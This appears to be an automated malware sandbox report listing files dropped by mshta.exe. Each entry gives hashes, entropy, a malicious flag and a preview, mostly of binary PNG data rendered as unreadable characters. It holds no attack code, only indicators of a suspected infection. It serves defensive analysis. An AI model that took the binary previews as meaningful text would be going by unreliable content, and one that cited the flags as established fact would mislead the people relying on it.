                                                                                                                                                                                                                                SSDEEP:768:UnlK9NO+IkZlcTj4wgUUvxRwWgaQDEvyIj:4K9NFqHlVERwbLE6I
                                                                                                                                                                                                                                MD5:4576D0CD7F770854C85A5801414B844B
                                                                                                                                                                                                                                SHA1:1D8572F543C6C17E7B3AAECBF93ADB272758A237
                                                                                                                                                                                                                                SHA-256:5C04D2D67961103EC35E526816B9FB57165F949640652607C39781DA8D8BFD77
                                                                                                                                                                                                                                SHA-512:44F763E6959056C93EC70B445A78C28E5B4F2E2689F01EC44482F3DF1A3D858148775F1A973A64DE474A5A4905DD96A636F1D292DD8CA73FD6B05B164FE829B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:var client;(()=>{var a={79382:(a,e,o)=>{"IntersectionObserver"in window?o.e(2078).then(o.bind(o,72078)):o.e(7946).then(o.t.bind(o,47946,23)).then((function(){o.e(2078).then(o.bind(o,72078))}))},59325:(a,e,o)=>{"use strict";o.r(e);o(79382)}},e={};function o(c){var i=e[c];if(void 0!==i)return i.exports;var t=e[c]={id:c,loaded:!1,exports:{}};return a[c].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}o.m=a,o.n=a=>{var e=a&&a.__esModule?()=>a.default:()=>a;return o.d(e,{a:e}),e},(()=>{var a,e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__;o.t=function(c,i){if(1&i&&(c=this(c)),8&i)return c;if("object"===typeof c&&c){if(4&i&&c.__esModule)return c;if(16&i&&"function"===typeof c.then)return c}var t=Object.create(null);o.r(t);var l={};a=a||[null,e({}),e([]),e(e)];for(var r=2&i&&c;"object"==typeof r&&!~a.indexOf(r);r=e(r))Object.getOwnPropertyNames(r).forEach(a=>l[a]=()=>c[a]);return l.default=()=>c,o.d(t,l),t}})(),o.d=(a,e)=>{for(var c in e)o.o(e,c)&&!o.o(a,c)&&Object.defi
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):293029
                                                                                                                                                                                                                                Entropy (8bit):7.997376111410533
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:BXRs+CdR/dKYPaTT1wCbFSp8d2hNRb8+YAsGGjLsp:0dVQhTT1w+FSHNF8+YAs8
                                                                                                                                                                                                                                MD5:13A94D342C713C85222FED81CD4A3D54
                                                                                                                                                                                                                                SHA1:4876993C9404CE19EBC225F88A30359A0C1CFDE9
                                                                                                                                                                                                                                SHA-256:24B644D1A837FCE5307C990DC576072A226B68085A2D86059EBACBA596F60D67
                                                                                                                                                                                                                                SHA-512:001C0BA2A5EB85F51BD19C37812B6BF635869E8FF1F2DC57984D4F8E1BF159008A480899D11E9E5D631EFB1ED45422EE29572DC1FA6E880B65B31C022B320FC9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..i.$.u..;7........6H.A..)qH....FhR.9f,Q...[..%.!J.Z8.....7.G.8..GThH.G...P.f.b.......P....@.k7...~KU.=.ps....z....T...{.9w.......&e.d....p.4.]~N.."..e....Bq....K.o..H`,W<0}ap.O....Uk.....m.K...X....)....xIK....U..4o..e,i.Zh^o...:.Z.J3....j....y....)..z.{...o...t%.4.>.>1.D..FW..,\i.]a.+....'...#,S9u..).,..*.m.....G....w...y..+.gR...]....;.M.......V..t......Y.O....$..Z.#{z.......%..."~..Ji:..":.(U...Q.S2_$6 ... =a.JHpa....?.c.E-..P.......'q.#.mW_GW...h...TS;T..j.ze......"..{..VXa..J....]..L..'....m.. ..Y1....?'...vU.#..E^k.....v...b.........Tu.*.?Z...q.....f...)D..M.!!.I..!.......<u...i...1.$.G.r1 F@.pKA.....;.P...Dnpm..*.l.,.7.;.,/oee.D...^.W.YI.y....@k"k.....a.l...7..?..2....W&...Qro..dY.Y....^.q..........I...@3;..eM.DNS.-.......fYMV...c..u.(....Jo.6.y.UK..-%....HrZ....r".q.}...U...Q.#..w...cr..P.fLBsT...m.do..Y<...I.|E...E...zD..MQ.o..,.....U......#..{.T.......y..r.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1062
                                                                                                                                                                                                                                Entropy (8bit):4.517838839626174
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                                                MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                                                SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                                                SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                                                SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 300 x 450, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):95343
                                                                                                                                                                                                                                Entropy (8bit):7.993104818599286
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:n5NTcFyg5mj11j3vdnb9/F363LaeK1XO/5IbCiOkcMzQeDUEoZopz1w9z1vbNrPr:nDTgJwx1j3v99/F36uhXO/5IckcM0eDM
                                                                                                                                                                                                                                MD5:59FB093E1C5E83F7C6AA792160BEFC6D
                                                                                                                                                                                                                                SHA1:6B0746A468B7AACE957227523E378E9ABA49E320
                                                                                                                                                                                                                                SHA-256:8B98B4CB5B2BA653BB93CE0A64857B1757910C9B528579A8FFAB8985B45214AF
                                                                                                                                                                                                                                SHA-512:B3B626C5D94D2EFFDF662D099E46AE7630D0D0964B834ABDDA1204221379A83D4C573BE7479243347ECA140CA865570CA806CF99D7FAFF3C09EF666360045F02
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR...,.........U3.....pHYs............... .IDATx..Y.$Iz..s.3.......\.K.......(.4.4....@..A.I.H3..M2....&.&..2<@.8),.....9.s.LO....]..g..z.........A..22....#..........9.QT....8.G..0.D.tAvp...=c..q......:.b..CMX.(.....8.G....a.}h...>$.C...._.v..~....l....~(.+B.z.T.!.f`?..DTw..~.7.z...{.4.:..,..!....U.#...........^....LZ.:..@..t!.q...SV.f.%.Af.A..&>...v...M....!>.......G.8.QD...'.;UO.X?:..x..k..k....4.m.5q@..CCX......0..Pz[1.d:iU_N..............\:3.W.........Z..,..i........$..,.3.....0..&..T...]...L.6$.FM<....5Ks.d.c'I.Y...t...=~(.......0n.GJ.......KR...y....'-.(&.......\...x.t.)....G.....h}.4..x..........W|........q;..o......x..C.rM}....vm......iQ.G.B..E.<B....Xw.O.....+d.D..$..Bk...{.sw...<....p....AaX\. ..T...VK.....a>*..IP..;>..h..F../....2........N.....y.-...Q..\....#.Q...*..px@.....f... y...$p...3..M.CS.....'.7}/...U...>.../!.....O.g....u......Z...".|..~m.......g?.......].e...%j6..7.*..01Q...8..5....W..B...3z.U.=
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9930
                                                                                                                                                                                                                                Entropy (8bit):7.954853301155207
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSn+geYVEWjFbk4yc0eL1PJ7MvOWiHaMmRlOixz97tXdibW9x9:4nfeYrBL1PJRWiHjKlOixB7tYbq9
                                                                                                                                                                                                                                MD5:62CF989CFD81560CB2E86C7465C6B8C9
                                                                                                                                                                                                                                SHA1:241330EE4EF4939815FA3673AC61746AC7B74FE2
                                                                                                                                                                                                                                SHA-256:DB9E5060D4F39A3615820B2368032F89652E79930B8E73D178E890BD42A655B6
                                                                                                                                                                                                                                SHA-512:C2357BBAF553AED3C1B9CD6CFFEF41A1E95B03583B888ACAF557C7F02F3014C9412B69ECAE137B982246BCCE5FDFD9BC3FD529B6B698BABD46A0DAE110771371
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs............... .IDATx..olSW....!..$........v.b.<.."p..y......a.'..C.....v.zf.......I_....HM.E..t...BLU4.. Ft...1....8..6!.......}.}..k.>.jc.{....=......@..A..A..A..A..A..A..A..A..A...+u.r....!.b...5........D....X...8...,. ...C..\6.N.?..- .............0...Q...r.~Y..'......A.&*.0.....r.}...r,.......R.. ....0......E...x.........&.0_)._T.....^...../...98..!:A..o.W....H0.....<Z.3..I.....A.~.-..i=.Op9..q.N.. .........Z.......B+....y...qs.....8x.dp#..4.8f.P....Z....yO..R./..CF..0.....X.......pH..a.F...9.<Z......8..... ./.e..++A.&..O.......w..B2'.B3\@.g.By...%.3..h.. .....xK>N5y....o$r.(".hd..q.tkO....r.....0........!...L..0.....j.@W......QZ....k..Oh...Q&0...0....h.... ..Z.e.Er%..SoN.e.c...^]S.N.9A.-.z..=:...Q.8. xr%.)t...R.. ....\.....\....D...0.Op....*....L#..1...%.*t.......a.\<.0#.....;...A....G..{F.G!d.. .rDpg.&..,. ...1...2G.dm'....2jVU..9.. ....GB..T.........a.1..].a;AX...7.}.A.PML.Dy....U...h~N...g
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 300 x 450, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51060
                                                                                                                                                                                                                                Entropy (8bit):7.99230909969834
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1536:stMfsWC7g8E8m0hy7qXOtsrCA7OySpnXLKHe:sKfsW+g8m0A7CiYC+ONpnXO+
                                                                                                                                                                                                                                MD5:DDED39A511CA31A7B84E621DB5A6B8B8
                                                                                                                                                                                                                                SHA1:360B63062C415966F08884A680333865480F1314
                                                                                                                                                                                                                                SHA-256:CA7F3611C4587DFDD36F9C55B5CCCCC7EA73451AA619659B15594C6CE8F482AC
                                                                                                                                                                                                                                SHA-512:F2908C2FB05DC265E5D3E296342B879C525243E8E607A1D9D1D4476C940589E135E0E73338961FB6E8376EC40067B8A155DB61FC1D8CF67AC82818E260869B5C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR...,.........U3.....pHYs............... .IDATx..Y.e.u...s.vs.jn.+J.(R")R.%E..Q.l8A.8..$N.o....O...~....).A..0.$ONl..KI,.%6"ER..esYu.N.n..s.<.....9.!U.{Fa..{....1.........M2'O. n.F.C....pO.@.<+..#.......yl..o...a.....d...A..<....l.b.Y..@o..Fn..........$`u(....w#7.~.....{..V..}....o.F......2h.....J|..q#7.>.....A.=.X..\<...y.K..jY...jnH....gB..S....`u(o<...........r|.[..<S...hY.<`...=.....Krv.X..OM.........x..E.4`..7r#.d.|.Nx.{{.rqc...$ ....,..T.?...........?nyf........0.......a.+..G.:..o,.v...Y.e..m....xB..L......Tx..........z..A`| ... 4.........(......3.X.W.}..{.zR.@X....Y.Y...WEXc...}..{Zr....A.j0...Y.....2.d.....n...}..u.....[]..y..|f.{...l{_.F.PL........*.'g....v..e.n^.r...}7.L.........o.......Q.^....j.p...~T...6.9.......y2f.a.j.o7 .j.....N.5=..e.x+.d.xw.O..v....r..7=.......:o'.e .^...=N.....7..Dd..w.XW.......4...\7............v..*..~.\....<.7]....G1...w......<..6....S...{..7....3.i\....{.w.;@....5]..mM..Xv..\...
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):233747
                                                                                                                                                                                                                                Entropy (8bit):7.995559821743559
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:5VNSBY9f2Z1Tp0Oou2v/GrvQezgEM4SXkzQ:5vV9OfT7ogRzg0SXCQ
                                                                                                                                                                                                                                MD5:12D627F2C3A692183351D98EF7087F75
                                                                                                                                                                                                                                SHA1:816036A152AE46718A1786F728C6F022EF3D15EF
                                                                                                                                                                                                                                SHA-256:C0794D0CC10A2D54E6F7DABEF47942564A8039555A90B81CA95B2BD5000B1074
                                                                                                                                                                                                                                SHA-512:8DA71D096D5EBF16AE1A6EF6CC705BD95731A99069F38090B1C554F2BB073F3E063C2ACC932CB813E06C653BBAC40C92D9ACF4BB9E46CF7B16190686DF6052A0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...4.y..{......g.M...)B..C..!..`...'1....U..$..._$.........A. .E..@)..(4%..E..........j.7.....wuw...>..|.{W.....z........&...q.)..4Z.>.....yeNK............9.s.Yy.6....6)..u..-..b~...?.k.g..g~....=.w.5..K..;kZ.k.l<...u.x.e....]..4.>..sb..~q.E..S......q.._@.....>.Y.t5....h.....e.]g4ti....\....J..h<f.U.r..z.....J;tN.......;3....7L7...#.......d.sM...Sg>...`...e..p.....<=..9..[D..#.....YRBs..y.]_........M.wH.n..U..!.`.D. <.W..}.{..../....{...H..q..Gl...Yw..z..[{....M.M.c.m..F3..6..2...c.8.&.^....m.<....s%9....i}.`1.P..;mY'.:.tqy.,....[...^..m.D.?.....~...L..p/....\...Ph-....p.../.."s..G...../b..#.'.o....8.#.F.&...s.U.i.X..g[k.C..M..&c].F...n.h.=<.k..j_...X....h....X]Y.Y.m..F...7...b.......!......9...$....|1...|=f_.G...(...q.._p...G...../_.?...P..M..Fi7.....Xw.3..e..m....Y."Z'S=....[.Vk^..\.3...c...$g.:.m...t..vO6I..b.q...}....}..f7J..n..C.xW5G.i_.Mq.M.}.....26.....A..M..8b.0.?Kx~..W.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):305658
                                                                                                                                                                                                                                Entropy (8bit):7.996546187796282
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:h4SFEZVFVWcubD9BsWTfg40H1kOFMQc80e/kqS2Tt3fgMNXQkCJNr:hjFEZV3WcSfgp1kOxcA/kq/3fgM5Qvx
                                                                                                                                                                                                                                MD5:0D2B22A16621D289146DFAF58E39C9B0
                                                                                                                                                                                                                                SHA1:CBC626B4B304D3160A5CAE052A327BFAE19ACADB
                                                                                                                                                                                                                                SHA-256:B7992F8360BC3CCAAEACD4129BAE5EBAC8E0B23044A9D51D20B49420F73190EB
                                                                                                                                                                                                                                SHA-512:BDF3724B5A6B9E5C36B3FB3BCC779B7414B050F56545A6B2DFC3DA996621001CF0084CF3416CAC6CEAAA8E2C4E86FB0136E07855C474139C6BBBD9BC491D7C41
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..y.-.Y.......<.w.{..4.... ..........vAAR.L.........;6.qR)..c0`9&..!..b..0....kB.iz.....?.Z.....=.s.....9.......k..7..q.0.".-..#..s.6~...0..^+#Z:....rB.g.7....d....k.i.v.].8..{.F..[1.....;j.....g...F.t2.8...'..{6n.....1.....<.43..E^7..I.....#/.......(...+.......,C.zNws...G.N.......ag..S^...._...v.4...F.i.:'i..........Z;..a.......#...)....$..3...:.......E.Y...p...q.x2..8..iPe..;M..i.(a|.8.y..O...5.....<!.<eQm........&..8.v...e|?.wy).GX....?...[.JVr..6.f....^....k.i....j.1L.1...n.;.9.....:..q..g....,..Y.A.o.9.....#.N..S.....M.X?.k.Id|.k.g.H..y:...K8.W..z..uy^..Y.p..Z.].?Y.-C./.."#..+Y.J^j...Y.E..e9...t.l.M_.d..ag..r..'.q......S.a!.........cZ..=........M]...t4...2.e.l....y.1...x.....i..s...[.....~...p.....4...&..~...W...An.c/.V..qe..\.E...v...0{k;3.0\..w|1.....v.3..,...E.dM+.4..'.g3......6..I.?P8..q.m....k'.=..i....i^_.i....g=l.cIvz...^....B.,.q.7..!......L#....d%.Qz..
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6959
                                                                                                                                                                                                                                Entropy (8bit):7.917724082541166
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:RSllFgHtF4de0e4CnRGUm1YUv6+oO4/iBbHlqMC/Wc:4lwNFue54CnUUmaUSnL/iBbHklWc
                                                                                                                                                                                                                                MD5:D7F5AE1C6293F4EF3FC5E04EEDA0CB8F
                                                                                                                                                                                                                                SHA1:1DA4DAFDEB8FDF771FC84ED0A7CF58B1EB349154
                                                                                                                                                                                                                                SHA-256:7D1AD7E6C9122CBDC3BC223062A01A60E1FE3B15417C452D1BC61D31CC0EDD73
                                                                                                                                                                                                                                SHA-512:C9E2D614EF701D15BE62E574F12A953303A499C8815B28086E93BEEB8D9C508E7925E233D3CCF3663C23262D159D34471516475CDEC2B27044DFECFF6D8DBDE6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............).....pHYs.................IDATx....t......l.K..6.U.V.(...CP..<Q."/y..R.m.>....?....z.O@-.@..._...j....9.).X...b....>......c......kw6....C.;{....q..;.i. ..M.w..(x.:Q.0.D....E..N...:Q.0.D....E@l...(..Q."...s_..iA....y...................U9.......p.....~^.....=?...[..._.p)......L.W...C?.....Q.].^..,....M.rel_.<....`...C....7....6.{N.=t.g.c..........D..`7...~. .....z>Z.......-.`.i.R`.......+.9.......0.......lX..7ae!g...f.x..f..r.N....+....F...z..{a....x]D.f&.l.....&.O..[..G.....E......+3..*.........'.of.... ..;.....h..Y..&..>..)X...J..A..<....\F.E3.,i~..W..l.p.O..E.u.2..5w?..../.W.P..}.*X..g..t..!."..!.......a.A...@."..b.k...%.u.VzY9.I.....6....).N.+......n.>..p.....\;.V.&8}.....0....i....q..Y.nq.."..w.p.....6...:D..+...u..o!Gcg.Hh..LJ..3..@/....|...r...>.v.e`...tX.........x"..[!1.E&...8.su.(....-.......Q.....}.8..Q..A'6Q..W."..mV......D..:..2...4X.(&..;...lO...2..BD..4..vA.8...Qp.f6[.5.U....R.,...}*...U...0.Yf......W."
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):52094
                                                                                                                                                                                                                                Entropy (8bit):7.989720330046295
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:D2fyj3bwxC6LUv/OmGtLRzGndqTfU0burK0xqnbpUFNj8rgNHRErldy77OPr9mkD:QWoI/OfjzGdqT/cEnbyNTNHOcfODAMD
                                                                                                                                                                                                                                MD5:8053463CB146FB307F42877DF38CBD3B
                                                                                                                                                                                                                                SHA1:42D65C57BB9CE4950D731CBD1AAE78A476805823
                                                                                                                                                                                                                                SHA-256:53DA8D19CB85FD5D4E6AB43F5A2D252566A0703AEE0ED97B2D45BF5B6C5279C0
                                                                                                                                                                                                                                SHA-512:92838B2DBC4A121A9E53C06C01D958D5B1F466799AB05F26E142A6E3258B39B81F6C067BB9A7BEFF7845DC33EC00F17330FA903F5343C0E95B115548C3EE903F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..w.\U.....;}gKv7.-I6.........A.......c.)ME..AT..<*H.T@.D.;B.T..[.%$.^6...........p)..y.fw..s..{..{...mD.p.p.0...4..m.A.u..(.C.R.!.6.O@n[6..........d^.i.Q.K.<.+.[......$.s.....\.u.T......Jc....f.7.T.:..x.x.cH...`/..@..^u..a.p$.@..g3...]@.Kw^u.....IP..).n`......%.#..."..Yq.u....q..l....E@..9.:.xI..;..+..l.._.k.1..#..Y`.. W..-.N.s......2..>0o..|.....^...gdd.T:.....>...|.![...?bY_.e.L.s...e...8....b.o|.|b1..}..g......3......./p...m..;...........|.......K~.c.,~..w.s4..p..W.....W.....T*...o.........O...g.v.T..~.k..=..S\...x...q#.l..v.S?.Q..o.-.........>...../|...s..._\.+..g...y...q#..........:.'....u.q...fv.iG.[.~..i.......1.....w.....y.'..D.q.....u..`..../....E.?.;.<.:.G........{.?......._>............c.>.Ri.=?..b.8.mc....c..y.&.?.......:.K/.........__.....7n.......n.uO>...Zo......_.t..K.,.....~....._....<.._..'.....7....A.<.x|T.._.t.!.I..p..T.......8.z......'....
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):85670
                                                                                                                                                                                                                                Entropy (8bit):7.984570153844694
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:+3i5mOU/jnQA3XC7CKNmPojqSCsPS9LgXE4M6uUo1DLof5LS1blyNcRI4:+ImOO8AnCWLojqSpK8NM6uUoRkf5LabP
                                                                                                                                                                                                                                MD5:0CD4830EA48178D58AC67CCC3168FD96
                                                                                                                                                                                                                                SHA1:A5B6E73DF6F8ADA603CD0486BED29853B9A6746E
                                                                                                                                                                                                                                SHA-256:8EA1F8296BA5937655DD3008FC65B8143AD4734334CFD03262DB907A92AFE3A6
                                                                                                                                                                                                                                SHA-512:E313753FCBF877FC9A9AF1D9841D8E12CA036F3797B94D1FE5D7DD442B68CAFCDC70D48D7C35A11F17B76878F2C1E3D2646AA8BC7CA11D65A5F3067C3D8D9ED9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......(........\....pHYs...........~... .IDATx......6....r..s..&.$*YDA$H.D.T.D....D.AD0....s8q..93..........<..o....i...U]U_}............&........b..r"F...j....U...b...#@.W5b...F..1\.. ...1..pU#F...j....U.......C.W.h.=P?...H.1\...{.Y}..$....h.=.....$....h.=..A...eD..1\.. ...1..pU#F...j....U...b...#@.W5b...F..1\.. ...1..pU#F...j....U...b...#@.W5b...F..1\.. ...1..pU#F.....B........p!......}.p.1.\.b...q~....p......&..^=......Z..5y..:....B....3.|..../........._....#.C;fy_>..He_.vn.]....kW..C.8?...Qg..M....A....?...?C7\.....K.A...S>#........E...g.1i..H".&.k.%....i..z.~.=.......e.r.e;..t.C.Rqi..iD.Ml.Y1X...Fj..4.1...#...b.B..9.H#.}j...w...G..|.....xd_.E.s.w.5...s1.tA... .}..F.l...I....{Q.k_%i/...8...Dziy....h.G..\.....x....9.....w.nX.k]%@....... ...^....B...;.}k./.ZD....pV..p..@.;..............t.8#_.$L.D6R.k.j.m:....;............F..9...G&...D\.F..h..v...,/d.Z.....J...@n..8.q...F..=...k.}F..Y..<..q...:..]..).q.....J.1...G..!.!...
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1295 x 160, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):56708
                                                                                                                                                                                                                                Entropy (8bit):7.97967017597513
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:OEkaFxUfzh0Wj/P/ZQIWNgvFZIdC2kRh9g3MQLVsSyp3cCCt/Hq/CNjKXBuTqkUJ:OEXFEpj/X6ecdC26reLz6Q/C7xubbQH
                                                                                                                                                                                                                                MD5:C51459DF261B7370F7748B09D389F4B7
                                                                                                                                                                                                                                SHA1:6202933CA5CA7D85A104552FE71F93344AE29414
                                                                                                                                                                                                                                SHA-256:56F84B5CDAA84647B78F889E592818787E460D18ED22050773AEFBDC9CA46A8A
                                                                                                                                                                                                                                SHA-512:C8FF91B9836C9EFB0D57EEA3D593BA151237EA51D0C5460B42400654769CB80DD4813E2654D59A5B5AF15AED67859B28CB90DB31EA2791E7C36CEFD626BC55F2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR...............3....pHYs............... .IDATx...y|T.....u...7.A.{...*..Pk]*U....VzW.w...[...Zo..m..Z....m.z[.A."..S[.......d..M&...9.?&.0.IX...y>..$s..9....u}@.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!F.u.. ..B.!.88..3.ch.+.ga..j...Q.P...&...=.!..._...!..B..O........7@.....Q.i..<.[~.."....G.C!..B.!F8..*..s..9.c.#.e.....?...B.......!..B.!.gY.../.8j.......%af..)..B.1...=.!..B.!........s...=...A....z..Z...X..B|<..#%..B.!..dY..WU.?...HS.q..t}@x.T....#..B.&..,..B.!........"..8D.....9.b.)..B.qD$<.B.!..b.r..]X...q..JJ.i.Ms!..B.#$..B.!..#.....*..v......P.o.I.4...B.!...h.@.!..B..Ekjivi...o..3...:..jT.PXhJ.,....fCh..hPC.A.A*...Q.!.a..P.!..B..E..;V...|............E.w..-a....5O..>......BC)e...w.B.!>.$<.B.!..b.P.J&.*........J.......`.%.|5..5.8.]......nY.P.!....e.!..B.1..].v.9..,'L..z...........;..(Zyy.6z.hm.uRy(.....2..B.!..y.u...-.h.t).....@W.R9.A.v..v......B..$...!..B.1..'..$.b8..g..1.!..'&..B.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26631
                                                                                                                                                                                                                                Entropy (8bit):7.975066122485574
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:yc1rfQTCwdemRYfKXhEWM1HoID94gYjm4SuD:yc5fQmwUmRYfihErHoS94+uD
                                                                                                                                                                                                                                MD5:7AE99EEF395A8A7428DB4F7DDBD535B7
                                                                                                                                                                                                                                SHA1:759AAAF5D3DC7F97BFB42A5C8A3CABBA78668F53
                                                                                                                                                                                                                                SHA-256:DAE16355C9CA16107DCC1532BB5CEE820440248BF50374716A4E003A4E53461E
                                                                                                                                                                                                                                SHA-512:D327F781F1FF7EF5D0424518CB396CA48E4EA7AEF7FDE067E3830C854F629B4EEDD063EB7E3FF8D6EF89C9B2F954D78AEE6352C02F4966546BC4522DA67B4452
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..y.$Gu'.}.u.=.s..fFf$...I\6k!....@...k...{......Z....$..].ds....~6 .lc.I........IH3..T.LOOwWU..?"^...K3U3o>=U........;"..D..[...U....V.6.0...O.A..V.<.."`..m.....6....H.5..[7.....4....Y ..g..J.|...4.m;.iWM.b.x......d.........|..n;+..^l.......x..4.7..a..[.E....U.$.......4.-M.O..4m&.;Z...#....4.KZ....c...K.Fw/..7.{q..O.1".`#....8...X.DalM.F.f..t.....=..(..y._........4.3..a..B.g.b....u.}'x@...i7...)&.....c...=....t....`..{v..\u.Gr4t.;....>.Sx.7..<tL.=.i..>X.8y.`|.....N.H....2PV}S[......3f.._.~.i..jg....+@...q=`*..=.....)......%.\Z#..'z$..O..S..:.}..p...=....x.U.F..5Xs..h>...4.S......<....[..Y.s.sw.g..3_.....@...Am.8.....+x.Eo.3....0.S.,....)......].-W._...S....}.O..?.[.m.^......y..fL...gc...@..S.Q.h|....?..;>..g...x...P..G....>4.M}...'...3.....|../:..[..z..+_......}.~..`.+..-...W..On?..(.......QL~./0./.v......a./....?......H.`=pBK..F..~...d~.h..?.M..........~.....].hn=..oyu.?.,h.
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
